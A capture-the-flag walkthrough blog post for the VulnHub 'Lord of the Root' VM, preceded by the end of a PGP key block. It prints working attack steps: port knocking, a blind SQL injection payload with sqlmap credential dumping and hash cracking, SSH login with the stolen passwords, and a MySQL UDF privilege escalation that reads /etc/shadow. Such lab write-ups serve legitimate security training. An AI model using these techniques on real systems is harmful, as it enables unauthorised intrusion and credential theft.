Jszs6ZOFNNWsa1KzNxVKrYpKHca8RNleKURREwy/7kMRfn3ROkqbhkJu5aE0ko5c
HTW+SGAqSQ1a6mOEZtYtR+ztU7m6+JA9cyg47xTm4IvwlimELzceZxz2UwCg34Vs
oXBGlnXQRi/TUvVT5Rl78NkEAKmRiWbDoQJe0BF9YihdLvk0ue+rq5PQEge+z7b4
fjke7D2IIoWkr+FgCtxtM0SIly5Yi3ykbXzQ9dVVCYsVq8mIIu7mnKx9MAEl+Oy3
cTOyqflPtXkVGkANWiBlTsDxxMYRz11gx3uz9IQN67UDTGZhZM/RNWNm0orYHQqJ
htCdBACoJyG6K6EnYWF7RnQ2HOR2BDeOfT7pfb3BqZgxu6P/hLNUwxGzkouqh9zW
dIV26UvUFH0uVqlIJIEL25bBUvT3SAb/YgUyWj8zGldIeHEb+Ey8NRrpA0jSgngw
2lEz8s2rXn26uqYmBZpaC31xuHElsabXcxoxO2NwKpOoQp8M+LQxMU4zIChub254
ZXJvQGh1c2htYWlsLmNvbSkgPG5vbnhlcm9AaHVzaG1haWwuY29tPohGBBMRAgAG
BQJTkwU9AAoJEK5I0soeQQ4/uiMAnjQVI0okFY27P+SUvucIRFCkpDlcAJ9SNR3a
Gsn1n8Vfly2Esrls0aknlrjMBFOTBT0QAgCUlP7AlfO4XuKGVCs4NvyBpd0KA0m0
wjndOHRNSIz44x24vLfTO0GrueWjPMqRRLHO8zLJS/BXO/BHo6ypjN87Af0VPV1h
cq20MEW2iujh3hBwthNwBWhtKdPXOndJGZaB7lshLJuWv9z6WyDNXj/SBEiV1gnP
m0ELeg8Syhy5pCjMAf9CkkCANdB2hchLE0PTZYpDc1aVLo4pxAUYl75JdYVhSlua
T6lYjxVLOO3IK7aEUvY4w+HkrhmHDkf13kA+Jq8uiEYEGBECAAYFAlOTBT0ACgkQ
rkjSyh5BDj82wACfZwQlT0+e7oAAAMAi2eZLgO1nj3oAn0FMwGF/bspm9suM5iWb
HboGqAx1=jtEG
-----END PGP PUBLIC KEY BLOCK-----


February 15, 2016

Exploits & PoC's, Hacking Tutorials, Uncategorized
No comments yet



VulnHub: Lord of the Root Solution
Greetingz! This is a quick and dirty solution for the Lord of the Root boot-to-root VM challenge. Enjoy! -1N3
DOWNLOAD
https://www.vulnhub.com/entry/lord-of-the-root-101,129/
DISCOVERY
# netdiscover -r 192.168.1.0/24

 Currently scanning: Finished!   |   Screen View: Unique Hosts                                                                                                                                                  
 5 Captured ARP Req/Rep packets, from 5 hosts.   Total size: 282                                                                                       
 _____________________________________________________________________________
   IP            At MAC Address      Count  Len   MAC Vendor                   
 ----------------------------------------------------------------------------- 
 192.168.1.101   00:0c:29:8c:bd:7b    01    042   VMware, Inc.                                                                                                                                                                         

ENUMERATION
                ____               
    _________  /  _/___  ___  _____
   / ___/ __ \ / // __ \/ _ \/ ___/
  (__  ) / / // // /_/ /  __/ /    
 /____/_/ /_/___/ .___/\___/_/     
               /_/                 

 + -- --=[http://xerosecurity.com
 + -- --=[sn1per v1.6 by 1N3

################################### Running recon #################################
Server:		206.248.154.22
Address:	206.248.154.22#53

** server can't find 101.1.168.192.in-addr.arpa: NXDOMAIN

Host 101.1.168.192.in-addr.arpa. not found: 3(NXDOMAIN)

################################### Pinging host ###################################
PING 192.168.1.101 (192.168.1.101) 56(84) bytes of data.

--- 192.168.1.101 ping statistics ---
1 packets transmitted, 0 received, 100% packet loss, time 0ms


################################### Running port scan ##############################

Starting Nmap 7.01 ( https://nmap.org ) at 2016-01-15 16:00 EST
Nmap scan report for 192.168.1.101
Host is up (0.00026s latency).
Not shown: 65534 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 3c:3d:e3:8e:35:f9:da:74:20:ef:aa:49:4a:1d:ed:dd (DSA)
|   2048 85:94:6c:87:c9:a8:35:0f:2c:db:bb:c1:3f:2a:50:c1 (RSA)
|_  256 f3:cd:aa:1d:05:f2:1e:8c:61:87:25:b6:f4:34:45:37 (ECDSA)
MAC Address: 00:0C:29:8C:BD:7B (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 3.19, Linux 3.2 - 4.0
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.25 ms 192.168.1.101

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 90.69 seconds

Starting Nmap 7.01 ( https://nmap.org ) at 2016-01-15 16:02 EST
Nmap scan report for 192.168.1.101
Host is up (0.00025s latency).
PORT     STATE         SERVICE      VERSION
53/udp   open|filtered domain
67/udp   open|filtered dhcps
68/udp   open|filtered dhcpc
88/udp   open|filtered kerberos-sec
137/udp  open|filtered netbios-ns
138/udp  open|filtered netbios-dgm
139/udp  open|filtered netbios-ssn
161/udp  open|filtered snmp
| snmp-hh3c-logins: 
|_  baseoid: 1.3.6.1.4.1.25506.2.12.1.1.1
162/udp  open|filtered snmptrap
389/udp  open|filtered ldap
520/udp  open|filtered route
2049/udp open|filtered nfs
MAC Address: 00:0C:29:8C:BD:7B (VMware)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.25 ms 192.168.1.101

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 124.99 seconds

SSH BANNER
Since our only open port was SSH, I decided to ssh and see what options or hints were available…
[email protected]:~# ssh 192.168.1.101

                                                  .____    _____________________________
                                                  |    |   \_____  \__    ___/\______   \
                                                  |    |    /   |   \|    |    |       _/
                                                  |    |___/    |    \    |    |    |   \
                                                  |_______ \_______  /____|    |____|_  /
                                                          \/       \/                 \/
 ____  __.                     __     ___________      .__                   .___ ___________      ___________       __
|    |/ _| ____   ____   ____ |  | __ \_   _____/______|__| ____   ____    __| _/ \__    ___/___   \_   _____/ _____/  |_  ___________
|      <  /    \ /  _ \_/ ___\|  |/ /  |    __) \_  __ \  |/ __ \ /    \  / __ |    |    | /  _ \   |    __)_ /    \   __\/ __ \_  __ \
|    |  \|   |  (  <_> )  \___|    <   |     \   |  | \/  \  ___/|   |  \/ /_/ |    |    |(  <_> )  |        \   |  \  | \  ___/|  | \/
|____|__ \___|  /\____/ \___  >__|_ \  \___  /   |__|  |__|\___  >___|  /\____ |    |____| \____/  /_______  /___|  /__|  \___  >__|
        \/    \/            \/     \/      \/                  \/     \/      \/                           \/     \/          \/
Easy as 1,2,3


PORT KNOCKING
As the SSH banner hints at, it seems that we would need to use port knocking in order to unlock any other hidden services running on the target.
[email protected]:/pentest/loot# knock 192.168.1.101 1 2 3

[email protected]:/pentest/loot# sniper 192.168.1.101

                ____               
    _________  /  _/___  ___  _____
   / ___/ __ \ / // __ \/ _ \/ ___/
  (__  ) / / // // /_/ /  __/ /    
 /____/_/ /_/___/ .___/\___/_/     
               /_/                 

 + -- --=[http://xerosecurity.com
 + -- --=[sn1per v1.6 by 1N3

################################### Running recon #################################
Server:		206.248.154.22
Address:	206.248.154.22#53

** server can't find 101.1.168.192.in-addr.arpa: NXDOMAIN

Host 101.1.168.192.in-addr.arpa. not found: 3(NXDOMAIN)

################################### Pinging host ###################################
PING 192.168.1.101 (192.168.1.101) 56(84) bytes of data.

--- 192.168.1.101 ping statistics ---
1 packets transmitted, 0 received, 100% packet loss, time 0ms


################################### Running port scan ##############################

Starting Nmap 7.01 ( https://nmap.org ) at 2016-01-15 16:16 EST
Nmap scan report for 192.168.1.101
Host is up (0.00022s latency).
Not shown: 65533 filtered ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 3c:3d:e3:8e:35:f9:da:74:20:ef:aa:49:4a:1d:ed:dd (DSA)
|   2048 85:94:6c:87:c9:a8:35:0f:2c:db:bb:c1:3f:2a:50:c1 (RSA)
|_  256 f3:cd:aa:1d:05:f2:1e:8c:61:87:25:b6:f4:34:45:37 (ECDSA)
1337/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:8C:BD:7B (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 3.19, Linux 3.2 - 4.0
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.22 ms 192.168.1.101

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 101.71 seconds

Starting Nmap 7.01 ( https://nmap.org ) at 2016-01-15 16:18 EST
Nmap scan report for 192.168.1.101
Host is up (0.00020s latency).
PORT     STATE         SERVICE      VERSION
53/udp   open|filtered domain
67/udp   open|filtered dhcps
68/udp   open|filtered dhcpc
88/udp   open|filtered kerberos-sec
137/udp  open|filtered netbios-ns
138/udp  open|filtered netbios-dgm
139/udp  open|filtered netbios-ssn
161/udp  open|filtered snmp
| snmp-hh3c-logins: 
|_  baseoid: 1.3.6.1.4.1.25506.2.12.1.1.1
162/udp  open|filtered snmptrap
389/udp  open|filtered ldap
520/udp  open|filtered route
2049/udp open|filtered nfs
MAC Address: 00:0C:29:8C:BD:7B (VMware)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.20 ms 192.168.1.101

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 122.93 seconds

INTERESTING RESPONSE
Now that we have an open Apache server listening on 1337/tcp, I quickly discovered an interesting response in the 404 pages..
HTTP/1.1 404 Not Found
Date: Sat, 16 Jan 2016 00:01:17 GMT
Server: Apache/2.4.7 (Ubuntu)
Last-Modified: Fri, 18 Sep 2015 03:47:34 GMT
ETag: "74-51ffd64576fc7"
Accept-Ranges: bytes
Content-Length: 116
Connection: close
Content-Type: text/html

< html>
< img src="/images/hipster.jpg" align="middle">
< !--THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh>
< /html>

DECODED MESSAGE
It seemed strange to have an encoded message in the HTML comments of the 404 page so I knew this was a hint and could likely be decoded. Sure enough, it appeared to be a double-encoded base64 string. 
THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh = Lzk3ODM0NTIxMC9pbmRleC5waHA= 

Lzk3ODM0NTIxMC9pbmRleC5waHA= = /978345210/index.php

LOGIN PAGE
Now that we decoded a message that seems to be reveal a hidden login page, the next obvious step was to either try some form of SQLi or auth bypass or brute force method to get further…
POST /978345210/index.php HTTP/1.1
Host: 192.168.1.101:1337
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.101:1337/978345210/index.php
Cookie: PHPSESSID=u3gjjtco6dqnq2c5peo530hbj3; BEEFHOOK=Ltt1x7RzZyuW6VnfdQu8dTM0zmXPpxe8Fgk6KjqhgU9KZzL4DptDN2KiVOyNsPTeiryahKYGwjIYTbbX
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 42

username=user&password=pass&submit=+Login+

HTTP/1.1 200 OK
Date: Fri, 15 Jan 2016 23:37:34 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 516
Connection: close
Content-Type: text/html

< !DOCTYPE html>
< html>
< head>
< title>LOTR Login!< /title>
< /head>
< body>
< div id="main">
< h1>Welcome to the Gates of Mordor< /h1>
< div id="login">
< form action="" method="post">
< label>User :< /label>
< input id="name" name="username" placeholder="username" type="text">< br>
< label>Password :< /label>
< input id="password" name="password" placeholder="**********" type="password">
< br>
< input name="submit" type="submit" value=" Login ">
< span>Username or Password is invalid< /span>
< /form>
< /div>
< /div>
< /body>
< /html>

SQL INJECTION VULNERABILITY
Scanning with Burpsuite quickly revealed that the login for was vulnerable to SQL injection. 
SQL INJECTION EXPLOITATION
Using SQLMap, we can dig into the DB and see what else we can find.
[email protected]:~# sqlmap -u 'http://192.168.1.101:1337/978345210/index.php' --data='username=user&password=pass&submit=+Login+' --cookie='PHPSESSID=u3gjjtco6dqnq2c5peo530hbj3; BEEFHOOK=Ltt1x7RzZyuW6VnfdQu8dTM0zmXPpxe8Fgk6KjqhgU9KZzL4DptDN2KiVOyNsPTeiryahKYGwjIYTbbX' --level=5 --risk=3
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-201601080a89}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 19:09:48

[19:09:48] [INFO] testing connection to the target URL
[19:09:48] [INFO] heuristics detected web page charset 'ascii'
[19:09:48] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[19:09:48] [INFO] testing if the target URL is stable
[19:09:49] [INFO] target URL is stable
[19:09:49] [INFO] testing if POST parameter 'username' is dynamic
[19:09:49] [WARNING] POST parameter 'username' does not appear dynamic
[19:09:49] [WARNING] heuristic (basic) test shows that POST parameter 'username' might not be injectable
[19:09:49] [INFO] testing for SQL injection on POST parameter 'username'
[19:10:21] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:10:31] [INFO] POST parameter 'username' seems to be 'MySQL >= 5.0.12 AND time-based blind (SELECT)' injectable 
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
[19:10:35] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[19:10:35] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
sqlmap got a 302 redirect to 'http://192.168.1.101:1337/978345210/profile.php'. Do you want to follow? [Y/n] y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N] y
[19:10:43] [INFO] target URL appears to be UNION injectable with 1 columns
[19:10:43] [WARNING] if UNION based SQL injection is not detected, please consider and/or try to force the back-end DBMS (e.g. '--dbms=mysql') 
[19:10:43] [INFO] testing 'Generic UNION query (random number) - 1 to 20 columns'
[19:10:44] [INFO] testing 'Generic UNION query (NULL) - 22 to 40 columns'
[19:10:45] [INFO] testing 'Generic UNION query (random number) - 22 to 40 columns'
[19:10:46] [INFO] testing 'Generic UNION query (NULL) - 42 to 60 columns'
[19:10:47] [INFO] testing 'Generic UNION query (random number) - 42 to 60 columns'
[19:10:48] [INFO] testing 'Generic UNION query (NULL) - 62 to 80 columns'
[19:10:49] [INFO] testing 'Generic UNION query (random number) - 62 to 80 columns'
[19:10:50] [INFO] testing 'Generic UNION query (NULL) - 82 to 100 columns'
[19:10:52] [INFO] testing 'Generic UNION query (random number) - 82 to 100 columns'
[19:10:53] [INFO] checking if the injection point on POST parameter 'username' is a false positive
POST parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 5852 HTTP(s) requests:
---
Parameter: username (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: username=user' AND (SELECT * FROM (SELECT(SLEEP(5)))wUmu) AND 'mbXF'='mbXF&password=pass&submit= Login 
---
[19:13:04] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL 5.0.12
[19:13:04] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.1.101'

[*] shutting down at 19:13:04





[email protected]:~# sqlmap -u 'http://192.168.1.101:1337/978345210/index.php' --data='username=user&password=pass&submit=+Login+' --cookie='PHPSESSID=u3gjjtco6dqnq2c5peo530hbj3; BEEFHOOK=Ltt1x7RzZyuW6VnfdQu8dTM0zmXPpxe8Fgk6KjqhgU9KZzL4DptDN2KiVOyNsPTeiryahKYGwjIYTbbX' --level=5 --risk=3 --all
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-201601080a89}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 19:14:15

[19:14:16] [INFO] resuming back-end DBMS 'mysql' 
[19:14:16] [INFO] testing connection to the target URL
[19:14:16] [INFO] heuristics detected web page charset 'ascii'
sqlmap got a 302 redirect to 'http://192.168.1.101:1337/978345210/profile.php'. Do you want to follow? [Y/n] y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] y
[19:14:18] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: username=user' AND (SELECT * FROM (SELECT(SLEEP(5)))wUmu) AND 'mbXF'='mbXF&password=pass&submit= Login 
---
[19:14:18] [INFO] the back-end DBMS is MySQL
[19:14:18] [INFO] fetching banner
[19:14:18] [WARNING] time-based comparison requires larger statistical model, please wait..............................                                                                                                                
[19:14:19] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors 
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
[19:14:39] [INFO] adjusting time delay to 1 second due to good response times
5.5.44-0ubuntu0.14.04.1
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS operating system: Linux Ubuntu
back-end DBMS: MySQL 5.0.12
banner:    '5.5.44-0ubuntu0.14.04.1'
[19:16:13] [INFO] fetching current user
[19:16:13] [INFO] retrieved: [email protected]
current user:    '[email protected]'
[19:17:23] [INFO] fetching current database
[19:17:23] [INFO] retrieved: Webapp
current database:    'Webapp'
[19:17:50] [INFO] fetching server hostname
[19:17:50] [INFO] retrieved: LordOfTheRoot
hostname:    'LordOfTheRoot'
[19:18:50] [INFO] testing if current user is DBA
[19:18:50] [INFO] fetching current user
current user is DBA:    True
[19:18:51] [INFO] fetching database users
[19:18:51] [INFO] fetching number of database users
[19:18:51] [INFO] retrieved: 5
[19:18:53] [INFO] retrieved: 'root'@'localhost'
[19:20:16] [INFO] retrieved: 'root'@'lordoftheroot'
[19:22:01] [INFO] retrieved: 'root'@'127.0.0.1'
[19:23:18] [INFO] retrieved: 'root'@'::1'
[19:24:10] [INFO] retrieved: 'debian-sys-maint'@'localhost'
database management system users [5]:
[*] 'debian-sys-maint'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'::1'
[*] 'root'@'localhost'
[*] 'root'@'lordoftheroot'

[19:26:15] [INFO] fetching database users password hashes
[19:26:15] [INFO] fetching database users
[19:26:15] [INFO] fetching number of password hashes for user 'root'
[19:26:15] [INFO] retrieved: 1
[19:26:17] [INFO] fetching password hashes for user 'root'
[19:26:17] [INFO] retrieved: *4DD56158ACDBA81BFE3FF9D3D7375231596CE10F
[19:28:32] [INFO] fetching number of password hashes for user 'debian-sys-maint'
[19:28:32] [INFO] retrieved: 1
[19:28:33] [INFO] fetching password hashes for user 'debian-sys-maint'
[19:28:33] [INFO] retrieved: *A55A9B9049F69BC2768C9284615361DFBD580B34
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[19:31:27] [INFO] writing hashes to a temporary file '/tmp/sqlmapmR6GTw22036/sqlmaphashes-GwopYC.txt' 
do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] y
[19:31:32] [INFO] using hash method 'mysql_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/txt/wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[19:31:34] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] y
[19:31:38] [INFO] starting dictionary-based cracking (mysql_passwd)
[19:31:38] [INFO] starting 8 processes 
[19:31:40] [INFO] cracked password 'darkshadow' for user 'root'                        
database management system users password hashes:                                                                                                                                                                                      
[*] debian-sys-maint [1]:
    password hash: *A55A9B9049F69BC2768C9284615361DFBD580B34
[*] root [1]:
    password hash: *4DD56158ACDBA81BFE3FF9D3D7375231596CE10F
    clear-text password: darkshadow

[19:35:14] [INFO] fetching database users privileges
[19:35:14] [INFO] fetching database users
[21:13:23] [INFO] fetching columns for table 'Users' in database 'Webapp'
[21:13:23] [INFO] retrieved: 3
[21:13:27] [INFO] retrieved: id
[21:13:37] [INFO] retrieved: username
[21:14:14] [INFO] retrieved: password
[21:14:56] [INFO] fetching entries for table 'Users' in database 'Webapp'
[21:14:56] [INFO] fetching number of entries for table 'Users' in database 'Webapp'
[21:14:56] [INFO] retrieved: 5
[21:14:59] [INFO] retrieved: 1
[21:15:03] [INFO] retrieved: iwilltakethering
[21:16:23] [INFO] retrieved: frodo
[21:16:51] [INFO] retrieved: 2
[21:16:55] [INFO] retrieved: MyPreciousR00t
[21:18:05] [INFO] retrieved: smeagol
[21:18:39] [INFO] retrieved: 3
[21:18:44] [INFO] retrieved: AndMySword
[21:19:32] [INFO] retrieved: aragorn
[21:20:05] [INFO] retrieved: 4
[21:20:10] [INFO] retrieved: AndMyBow
[21:20:45] [INFO] retrieved: legolas
[21:21:20] [INFO] retrieved: 5
[21:21:24] [INFO] retrieved: AndMyAxe
[21:21:57] [INFO] retrieved: gimli
[21:22:20] [INFO] analyzing table dump for possible password hashes
Database: Webapp
Table: Users
[5 entries]
+----+----------+------------------+
| id | username | password         |
+----+----------+------------------+
| 1  | frodo    | iwilltakethering |
| 2  | smeagol  | MyPreciousR00t   |
| 3  | aragorn  | AndMySword       |
| 4  | legolas  | AndMyBow         |
| 5  | gimli    | AndMyAxe         |
+----+----------+------------------+

[21:22:20] [INFO] table 'Webapp.Users' dumped to CSV file '/root/.sqlmap/output/192.168.1.101/dump/Webapp/Users.csv'

SSH LOGIN
Now that we have lots of credentials and clear-text passwords, the next obvious route was to re-try logging in with the accounts over SSH…
[email protected]:~# ssh [email protected]

                                                  .____    _____________________________
                                                  |    |   \_____  \__    ___/\______   \
                                                  |    |    /   |   \|    |    |       _/
                                                  |    |___/    |    \    |    |    |   \
                                                  |_______ \_______  /____|    |____|_  /
                                                          \/       \/                 \/
 ____  __.                     __     ___________      .__                   .___ ___________      ___________       __
|    |/ _| ____   ____   ____ |  | __ \_   _____/______|__| ____   ____    __| _/ \__    ___/___   \_   _____/ _____/  |_  ___________
|      <  /    \ /  _ \_/ ___\|  |/ /  |    __) \_  __ \  |/ __ \ /    \  / __ |    |    | /  _ \   |    __)_ /    \   __\/ __ \_  __ \
|    |  \|   |  (  <_> )  \___|    <   |     \   |  | \/  \  ___/|   |  \/ /_/ |    |    |(  <_> )  |        \   |  \  | \  ___/|  | \/
|____|__ \___|  /\____/ \___  >__|_ \  \___  /   |__|  |__|\___  >___|  /\____ |    |____| \____/  /_______  /___|  /__|  \___  >__|
        \/    \/            \/     \/      \/                  \/     \/      \/                           \/     \/          \/
Easy as 1,2,3
[email protected]'s password: 
Welcome to Ubuntu 14.04.3 LTS (GNU/Linux 3.19.0-25-generic i686)

 * Documentation:  https://help.ubuntu.com/

                            .____    _____________________________                              
                            |    |   \_____  \__    ___/\______   \                             
                            |    |    /   |   \|    |    |       _/                             
                            |    |___/    |    \    |    |    |   \                             
                            |_______ \_______  /____|    |____|_  /                             
                                    \/       \/                 \/                              
 __      __       .__                                ___________      .__                   .___
/  \    /  \ ____ |  |   ____  ____   _____   ____   \_   _____/______|__| ____   ____    __| _/
\   \/\/   // __ \|  | _/ ___\/  _ \ /     \_/ __ \   |    __) \_  __ \  |/ __ \ /    \  / __ | 
 \        /\  ___/|  |_\  \__(  <_> )  Y Y  \  ___/   |     \   |  | \/  \  ___/|   |  \/ /_/ | 
  \__/\  /  \___  >____/\___  >____/|__|_|  /\___  >  \___  /   |__|  |__|\___  >___|  /\____ | 
       \/       \/          \/            \/     \/       \/                  \/     \/      \/ 
Last login: Tue Sep 22 12:59:38 2015 from 192.168.55.135
[email protected]:~$ ls
Desktop  Documents  Downloads  examples.desktop  Music  Pictures  Public  Templates  Videos
[email protected]:~$ uname -a
Linux LordOfTheRoot 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:18:00 UTC 2015 i686 i686 i686 GNU/Linux
[email protected]:~$ sudo su
[sudo] password for smeagol: 
smeagol is not in the sudoers file.  This incident will be reported.


[email protected]:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
messagebus:x:102:106::/var/run/dbus:/bin/false
usbmux:x:103:46:usbmux daemon,,,:/home/usbmux:/bin/false
dnsmasq:x:104:65534:dnsmasq,,,:/var/lib/misc:/bin/false
avahi-autoipd:x:105:113:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
kernoops:x:106:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
rtkit:x:107:114:RealtimeKit,,,:/proc:/bin/false
saned:x:108:115::/home/saned:/bin/false
whoopsie:x:109:116::/nonexistent:/bin/false
speech-dispatcher:x:110:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh
avahi:x:111:117:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
lightdm:x:112:118:Light Display Manager:/var/lib/lightdm:/bin/false
colord:x:113:121:colord colour management daemon,,,:/var/lib/colord:/bin/false
hplip:x:114:7:HPLIP system user,,,:/var/run/hplip:/bin/false
pulse:x:115:122:PulseAudio daemon,,,:/var/run/pulse:/bin/false
smeagol:x:1000:1000:smeagol,,,:/home/smeagol:/bin/bash
mysql:x:116:125:MySQL Server,,,:/nonexistent:/bin/false
sshd:x:117:65534::/var/run/sshd:/usr/sbin/nologin
[email protected]:~$ 

MYSQL USER DEFINED FUNCTIONS PRIVILEGE ESCALATION
Now that we have a full SSH shell to the target, the next route to root is privilege escalation. Since I had the local root password from the SQL DB and a full SSH shell, I decided the quickest way would be to use a user-defined function via the MySQL UDF exploit.
gcc -g -c raptor_udf2.c
gcc -g -shared -W1,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
mysql -u root -p


use mysql;
create table foo(line blob);
insert into foo values(load_file('/tmp/raptor_udf2.so'));
select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
create function do_system returns integer soname 'raptor_udf2.so';
select * from mysql.func;


mysql> SELECT do_system('cat /etc/shadow');
+------------------------------+
| do_system('cat /etc/shadow') |
+------------------------------+
|                            0 |
+------------------------------+
1 row in set (0.01 sec)

mysql> select do_system('cat /etc/shadow > /tmp/shadow');
+--------------------------------------------+
| do_system('cat /etc/shadow > /tmp/shadow') |
+--------------------------------------------+
|                                          0 |
+--------------------------------------------+
1 row in set (0.01 sec)

mysql> select do_system('chmod 777 /tmp/shadow');
+------------------------------------+
| do_system('chmod 777 /tmp/shadow') |
+------------------------------------+
|                                  0 |
+------------------------------------+
1 row in set (0.02 sec)


[email protected]:/tmp$ cat shadow
root:$6$cQPCchYp$rWjOEHF47iuaGk/DQdkG6Dhhfm3.hTaNZPO4MoyBz2.bn44fERcQ23XCsp43LOt5NReEUjwDF8WDa5i1ML2jH.:16695:0:99999:7:::
daemon:*:16652:0:99999:7:::
bin:*:16652:0:99999:7:::
sys:*:16652:0:99999:7:::
sync:*:16652:0:99999:7:::
games:*:16652:0:99999:7:::
man:*:16652:0:99999:7:::
lp:*:16652:0:99999:7:::
mail:*:16652:0:99999:7:::
